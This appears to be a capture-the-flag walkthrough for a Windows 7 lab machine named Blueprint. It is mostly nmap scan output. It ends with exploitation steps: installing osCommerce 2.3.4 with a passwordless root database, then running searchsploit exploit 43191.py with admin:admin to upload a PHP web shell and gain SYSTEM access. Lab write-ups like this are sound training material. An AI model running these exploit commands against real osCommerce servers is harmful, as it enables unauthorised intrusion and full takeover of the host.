๐ Table of Contents
$ sudo rustscan -b 8192 -u 16384 -a 10.10.112.251 -- -sS -sV -sC -oN 10.10.112.251.$(basename $PWD).nmap.txt
# Nmap 7.92 scan initiated Thu Dec 16 16:54:55 2021 as: nmap -vvv -p 80,139,135,445,443,3306,8080,49160,49159,49153,49154,49152,49158 -sS -sV -sC -oN 10.10.112.251.blueprint.nmap.txt 10.10.112.251
Nmap scan report for 10.10.112.251
Host is up, received syn-ack ttl 125 (0.28s latency).
Scanned at 2021-12-16 16:54:57 PST for 82s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 7.5
|_http-title: 404 - File or directory not found.
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 125 Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Index of /
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
| SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds syn-ack ttl 125 Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql syn-ack ttl 125 MariaDB (unauthorized)
8080/tcp open http syn-ack ttl 125 Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-title: Index of /
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
49152/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49159/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49160/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:7b:99:93:7f:19 (unknown)
| Names:
| BLUEPRINT<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| BLUEPRINT<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| \\x01\\x02__MSBROWSE__\\x02<01> Flags: <group><active>
| Statistics:
| 02 7b 99 93 7f 19 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: BLUEPRINT
| NetBIOS computer name: BLUEPRINT\\x00
| Workgroup: WORKGROUP\\x00
|_ System time: 2021-12-17T00:56:04+00:00
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-17T00:56:06
|_ start_date: 2021-12-17T00:52:52
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 49066/tcp): CLEAN (Couldn't connect)
| Check 2 (port 55652/tcp): CLEAN (Couldn't connect)
| Check 3 (port 30886/udp): CLEAN (Timeout)
| Check 4 (port 20461/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Thu Dec 16 16:56:19 2021 -- 1 IP address (1 host up) scanned in 84.36 seconds
Based on the output of the rust/nmap scan we can easily guess that this is a Windows machine.
| Port | Findings |
|---|---|
| 80 | Windows IIS Webserver |
| 443/8080 | Apache Webserver with directory browsing enabled (Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28 Server at 10.10.112.251 Port 8080) |
| Folder titled โoscommerce-2.3.4โ | |
| 135/139/445 | NetBIOS / Samba / NFS |
| 3306 | MariaDB |
Through enumeration and dirbusting weโre eventually supposed to find that we can install OSCommerce ourselves... and then exploit it. Gee golly.
Install OSCommerce is /catalog/install/. Username: root, No password. Any database name.
Then use osCommerce 2.3.4.1 Authenticated Arbitrary File Upload
$ searchsploit -m php/webapps/43191.py
$ ./43191.py -u [<http://10.10.112.251:8080/oscommerce-2.3.4>](<http://10.10.112.251:8080/oscommerce-2.3.4>) --auth=admin:admin -f shell.php
From you here are NT Authority/system. Enjoy.